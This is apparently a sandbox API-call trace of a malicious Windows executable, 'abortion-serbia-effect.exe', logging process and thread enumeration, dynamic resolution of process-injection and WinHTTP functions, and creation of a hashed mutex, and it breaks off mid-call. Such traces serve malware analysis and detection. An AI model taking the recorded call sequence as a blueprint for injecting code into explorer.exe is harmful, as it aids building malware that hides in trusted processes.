(in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0263.432] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa70) returned 0x0 [0263.432] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0263.432] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb00) returned 0x0 [0263.432] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0263.433] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbdc) returned 0xec [0263.433] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0263.433] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0263.433] CloseHandle (hObject=0xec) returned 1 [0263.433] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0263.434] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x790) returned 0xec [0263.434] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0263.434] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0263.434] CloseHandle (hObject=0xec) returned 1 [0263.434] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0263.434] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x92c) returned 0xec [0263.434] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0263.434] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0263.434] CloseHandle (hObject=0xec) returned 1 [0263.434] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0263.434] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0263.435] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0xec [0263.435] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0263.435] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0263.435] CloseHandle (hObject=0xec) returned 1 [0263.435] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0263.435] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0263.436] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x954) returned 0xec [0263.436] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0263.436] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0263.436] CloseHandle (hObject=0xec) returned 1 [0263.436] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 0 [0263.436] CloseHandle (hObject=0xe8) returned 1 [0263.436] Sleep (dwMilliseconds=0x3e8) Process: id = "17" image_name = "abortion-serbia-effect.exe" filename = "c:\\program files\\windows media player\\abortion-serbia-effect.exe" page_root = "0x66b57000" os_pid = "0xc4" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "injection" parent_id = "16" os_parent_pid = "0x958" cmd_line = "\"C:\\Program Files\\Windows Media Player\\abortion-serbia-effect.exe\" " cur_dir = "C:\\Program Files\\Windows Media Player\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 199 os_tid = 0x9d8 Thread: id = 200 os_tid = 0x90 Thread: id = 201 os_tid = 0x950 [0163.798] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76c20000 [0163.799] GetProcAddress (hModule=0x76c20000, lpProcName="Sleep") returned 0x76c310ff [0163.799] GetProcAddress (hModule=0x76c20000, lpProcName="ReadProcessMemory") returned 0x76c4cfcc [0163.799] GetProcAddress (hModule=0x76c20000, lpProcName="Thread32Next") returned 0x76cb5c3f [0163.799] GetProcAddress (hModule=0x76c20000, lpProcName="lstrcatA") returned 0x76c52b7a [0163.799] GetProcAddress (hModule=0x76c20000, lpProcName="ExitThread") returned 0x7718d598 [0163.799] GetProcAddress (hModule=0x76c20000, lpProcName="MultiByteToWideChar") returned 0x76c3192e [0163.799] GetProcAddress (hModule=0x76c20000, lpProcName="RtlMoveMemory") returned 0x77193c40 [0163.799] GetProcAddress (hModule=0x76c20000, lpProcName="GetLastError") returned 0x76c311c0 [0163.799] GetProcAddress (hModule=0x76c20000, lpProcName="lstrcmpiA") returned 0x76c33e8e [0163.799] GetProcAddress (hModule=0x76c20000, lpProcName="GetProcAddress") returned 0x76c31222 [0163.800] GetProcAddress (hModule=0x76c20000, lpProcName="VirtualAlloc") returned 0x76c31856 [0163.800] GetProcAddress (hModule=0x76c20000, lpProcName="LoadLibraryA") returned 0x76c349d7 [0163.800] GetProcAddress (hModule=0x76c20000, lpProcName="OpenThread") returned 0x76c41248 [0163.800] GetProcAddress (hModule=0x76c20000, lpProcName="Process32Next") returned 0x76c588a4 [0163.800] GetProcAddress (hModule=0x76c20000, lpProcName="GetModuleFileNameA") returned 0x76c314b1 [0163.800] GetProcAddress (hModule=0x76c20000, lpProcName="GetModuleHandleA") returned 0x76c31245 [0163.800] GetProcAddress (hModule=0x76c20000, lpProcName="CreateMutexA") returned 0x76c34c6b [0163.800] GetProcAddress (hModule=0x76c20000, lpProcName="VirtualProtect") returned 0x76c3435f [0163.800] GetProcAddress (hModule=0x76c20000, lpProcName="CreateToolhelp32Snapshot") returned 0x76c5735f [0163.800] GetProcAddress (hModule=0x76c20000, lpProcName="GetCurrentThreadId") returned 0x76c31450 [0163.800] GetProcAddress (hModule=0x76c20000, lpProcName="CloseHandle") returned 0x76c31410 [0163.800] GetProcAddress (hModule=0x76c20000, lpProcName="GetCurrentProcessId") returned 0x76c311f8 [0163.801] GetProcAddress (hModule=0x76c20000, lpProcName="WriteProcessMemory") returned 0x76c4d9e0 [0163.801] GetProcAddress (hModule=0x76c20000, lpProcName="SuspendThread") returned 0x76c57d7e [0163.801] GetProcAddress (hModule=0x76c20000, lpProcName="ResumeThread") returned 0x76c343ef [0163.801] GetProcAddress (hModule=0x76c20000, lpProcName="RtlZeroMemory") returned 0x77193c10 [0163.801] GetProcAddress (hModule=0x76c20000, lpProcName="Thread32First") returned 0x76cb5b93 [0163.801] GetProcAddress (hModule=0x76c20000, lpProcName="CreateRemoteThread") returned 0x76cb416b [0163.801] GetProcAddress (hModule=0x76c20000, lpProcName="OpenProcess") returned 0x76c31986 [0163.801] GetProcAddress (hModule=0x76c20000, lpProcName="GetProcessHeap") returned 0x76c314e9 [0163.801] GetProcAddress (hModule=0x76c20000, lpProcName="VirtualFree") returned 0x76c3186e [0163.801] GetProcAddress (hModule=0x76c20000, lpProcName="Process32First") returned 0x76c58ae7 [0163.801] GetProcAddress (hModule=0x76c20000, lpProcName="HeapFree") returned 0x76c314c9 [0163.801] GetProcAddress (hModule=0x76c20000, lpProcName="HeapAlloc") returned 0x7715e026 [0163.801] GetProcAddress (hModule=0x76c20000, lpProcName="VirtualQuery") returned 0x76c3445a [0163.802] GetProcAddress (hModule=0x76c20000, lpProcName="lstrlenA") returned 0x76c35a4b [0163.802] GetProcAddress (hModule=0x76c20000, lpProcName="IsWow64Process") returned 0x76c3195e [0163.802] GetProcAddress (hModule=0x76c20000, lpProcName="HeapReAlloc") returned 0x77171f6e [0163.802] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x74d40000 [0163.802] GetProcAddress (hModule=0x74d40000, lpProcName="CryptDestroyHash") returned 0x74d4df66 [0163.802] GetProcAddress (hModule=0x74d40000, lpProcName="CryptReleaseContext") returned 0x74d4e124 [0163.802] GetProcAddress (hModule=0x74d40000, lpProcName="CryptHashData") returned 0x74d4df36 [0163.802] GetProcAddress (hModule=0x74d40000, lpProcName="CryptGetHashParam") returned 0x74d4df7e [0163.802] GetProcAddress (hModule=0x74d40000, lpProcName="CryptCreateHash") returned 0x74d4df4e [0163.802] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContextA") returned 0x74d491dd [0163.802] LoadLibraryA (lpLibFileName="CRYPT32.dll") returned 0x759b0000 [0163.809] GetProcAddress (hModule=0x759b0000, lpProcName="CryptStringToBinaryA") returned 0x759e5d77 [0163.810] GetProcAddress (hModule=0x759b0000, lpProcName="CryptBinaryToStringA") returned 0x759ea8c5 [0163.810] LoadLibraryA (lpLibFileName="DNSAPI.dll") returned 0x74850000 [0163.814] GetProcAddress (hModule=0x74850000, lpProcName="DnsFree") returned 0x7485436b [0163.814] GetProcAddress (hModule=0x74850000, lpProcName="DnsQuery_W") returned 0x7486572c [0163.814] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77130000 [0163.814] GetProcAddress (hModule=0x77130000, lpProcName="NtCreateSection") returned 0x7714ff94 [0163.814] GetProcAddress (hModule=0x77130000, lpProcName="NtSetInformationProcess") returned 0x7714fb18 [0163.814] GetProcAddress (hModule=0x77130000, lpProcName="NtMapViewOfSection") returned 0x7714fc40 [0163.814] GetProcAddress (hModule=0x77130000, lpProcName="LdrProcessRelocationBlock") returned 0x771de9cf [0163.814] GetProcAddress (hModule=0x77130000, lpProcName="NtUnmapViewOfSection") returned 0x7714fc70 [0163.815] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x74f40000 [0163.815] GetProcAddress (hModule=0x74f40000, lpProcName="wsprintfW") returned 0x74f7e061 [0163.815] GetProcAddress (hModule=0x74f40000, lpProcName="wsprintfA") returned 0x74f6ae5f [0163.815] LoadLibraryA (lpLibFileName="WINHTTP.dll") returned 0x747f0000 [0163.817] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpReadData") returned 0x747fcb9e [0163.817] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpAddRequestHeaders") returned 0x74809dfb [0163.818] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpCrackUrl") returned 0x7480953a [0163.818] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpGetProxyForUrl") returned 0x747fd5dc [0163.818] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpOpenRequest") returned 0x747f4aea [0163.818] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpOpen") returned 0x747f58b9 [0163.818] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpCloseHandle") returned 0x747f2c01 [0163.818] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpSendRequest") returned 0x747f79bd [0163.818] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpGetIEProxyConfigForCurrentUser") returned 0x7480257e [0163.818] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpSetOption") returned 0x747f3f6c [0163.818] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpReceiveResponse") returned 0x747fb262 [0163.818] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpConnect") returned 0x747fd9f5 [0163.818] LoadLibraryA (lpLibFileName="WS2_32.dll") returned 0x75bc0000 [0163.819] GetProcAddress (hModule=0x75bc0000, lpProcName=0xc) returned 0x75bcb131 [0163.819] GetProcAddress (hModule=0x75bc0000, lpProcName=0x5) returned 0x75bc7147 [0163.819] GetProcAddress (hModule=0x75bc0000, lpProcName=0xf) returned 0x75bc2d8b [0163.819] VirtualProtect (in: lpAddress=0x120000, dwSize=0x1000, flNewProtect=0x4, lpflOldProtect=0x22dfb80 | out: lpflOldProtect=0x22dfb80*=0x40) returned 1 [0163.819] VirtualProtect (in: lpAddress=0x120000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x22dfb80 | out: lpflOldProtect=0x22dfb80*=0x4) returned 1 [0163.820] VirtualQuery (in: lpAddress=0x160016, lpBuffer=0x22dfb78, dwLength=0x1c | out: lpBuffer=0x22dfb78*(BaseAddress=0x160000, AllocationBase=0x160000, AllocationProtect=0x40, RegionSize=0x1000, State=0x1000, Protect=0x40, Type=0x40000)) returned 0x1c [0163.820] GetProcessHeap () returned 0x510000 [0163.820] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x364) returned 0x5305d8 [0163.820] RtlMoveMemory (in: Destination=0x5305d8, Source=0x160016, Length=0x363 | out: Destination=0x5305d8) [0163.820] NtUnmapViewOfSection (ProcessHandle=0xffffffff, BaseAddress=0x160016) returned 0x0 [0163.821] GetCurrentProcessId () returned 0xc4 [0163.821] GetProcessHeap () returned 0x510000 [0163.821] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x105) returned 0x530948 [0163.821] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x530948, nSize=0x104 | out: lpFilename="C:\\Program Files\\Windows Media Player\\abortion-serbia-effect.exe" (normalized: "c:\\program files\\windows media player\\abortion-serbia-effect.exe")) returned 0x40 [0163.821] GetProcessHeap () returned 0x510000 [0163.821] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x105) returned 0x530a58 [0163.821] GetCurrentProcessId () returned 0xc4 [0163.821] wsprintfA (in: param_1=0x530a58, param_2="%s%d%d%d" | out: param_1="C:\\Program Files\\Windows Media Player\\abortion-serbia-effect.exe3708421241963") returned 77 [0163.821] CryptAcquireContextA (in: phProv=0x22dfb7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x22dfb7c*=0x530ba8) returned 1 [0164.068] CryptCreateHash (in: hProv=0x530ba8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x22dfb80 | out: phHash=0x22dfb80) returned 1 [0164.069] lstrlenA (lpString="C:\\Program Files\\Windows Media Player\\abortion-serbia-effect.exe3708421241963") returned 77 [0164.069] CryptHashData (hHash=0x5314c8, pbData=0x530a58, dwDataLen=0x4d, dwFlags=0x0) returned 1 [0164.069] CryptGetHashParam (in: hHash=0x5314c8, dwParam=0x2, pbData=0x22dfb6c, pdwDataLen=0x22dfb84, dwFlags=0x0 | out: pbData=0x22dfb6c, pdwDataLen=0x22dfb84) returned 1 [0164.069] wsprintfA (in: param_1=0x530a58, param_2="%02X" | out: param_1="B6") returned 2 [0164.069] wsprintfA (in: param_1=0x530a5a, param_2="%02X" | out: param_1="90") returned 2 [0164.069] wsprintfA (in: param_1=0x530a5c, param_2="%02X" | out: param_1="E1") returned 2 [0164.069] wsprintfA (in: param_1=0x530a5e, param_2="%02X" | out: param_1="6A") returned 2 [0164.069] wsprintfA (in: param_1=0x530a60, param_2="%02X" | out: param_1="32") returned 2 [0164.069] wsprintfA (in: param_1=0x530a62, param_2="%02X" | out: param_1="83") returned 2 [0164.069] wsprintfA (in: param_1=0x530a64, param_2="%02X" | out: param_1="56") returned 2 [0164.069] wsprintfA (in: param_1=0x530a66, param_2="%02X" | out: param_1="E8") returned 2 [0164.069] wsprintfA (in: param_1=0x530a68, param_2="%02X" | out: param_1="C2") returned 2 [0164.069] wsprintfA (in: param_1=0x530a6a, param_2="%02X" | out: param_1="3D") returned 2 [0164.069] wsprintfA (in: param_1=0x530a6c, param_2="%02X" | out: param_1="01") returned 2 [0164.069] wsprintfA (in: param_1=0x530a6e, param_2="%02X" | out: param_1="67") returned 2 [0164.069] wsprintfA (in: param_1=0x530a70, param_2="%02X" | out: param_1="00") returned 2 [0164.069] wsprintfA (in: param_1=0x530a72, param_2="%02X" | out: param_1="CC") returned 2 [0164.069] wsprintfA (in: param_1=0x530a74, param_2="%02X" | out: param_1="EE") returned 2 [0164.070] wsprintfA (in: param_1=0x530a76, param_2="%02X" | out: param_1="E6") returned 2 [0164.070] CryptDestroyHash (hHash=0x5314c8) returned 1 [0164.070] CryptReleaseContext (hProv=0x530ba8, dwFlags=0x0) returned 1 [0164.070] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="B690E16A328356E8C23D016700CCEEE6") returned 0x80 [0164.070] GetLastError () returned 0x0 [0164.070] Sleep (dwMilliseconds=0x1f4) [0165.159] GetCurrentProcessId () returned 0xc4 [0165.159] GetCurrentThreadId () returned 0x950 [0165.159] CreateToolhelp32Snapshot (dwFlags=0x4, th32ProcessID=0x0) returned 0x88 [0165.162] Thread32First (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.162] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.163] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.163] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.163] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.164] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.164] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.164] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.165] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.165] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.165] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.166] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.166] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.166] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.167] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.167] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.167] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.168] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.168] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.169] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.169] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.169] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.169] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.170] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.170] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.170] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.172] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.172] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.172] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.173] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.173] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.173] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.174] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.174] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.174] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.175] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.175] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.175] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.175] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.176] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.176] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.176] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.177] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.177] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.177] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.178] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.178] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.178] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.179] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.179] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.179] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.179] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.180] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.180] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.180] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.181] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.181] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.181] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.182] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.182] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.182] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.183] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.183] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.183] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.183] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.184] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.184] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.184] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.185] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.185] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.185] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.186] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.186] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.186] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.187] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.187] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.187] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.187] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.188] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.188] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.188] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.189] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.189] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.189] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.190] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.190] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.190] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.191] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.191] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.191] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.192] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.192] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.192] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.192] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.193] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.193] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.193] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.194] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.347] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.347] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.347] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.348] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.348] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.348] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.349] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.349] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.349] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.350] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.350] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.350] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.350] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.351] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.351] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.351] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.352] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.352] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.352] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.353] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.363] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.363] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.363] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.364] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.364] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.364] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.365] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.365] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.365] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.366] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.367] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.367] Thread32Next (hSnapshot=0x88, 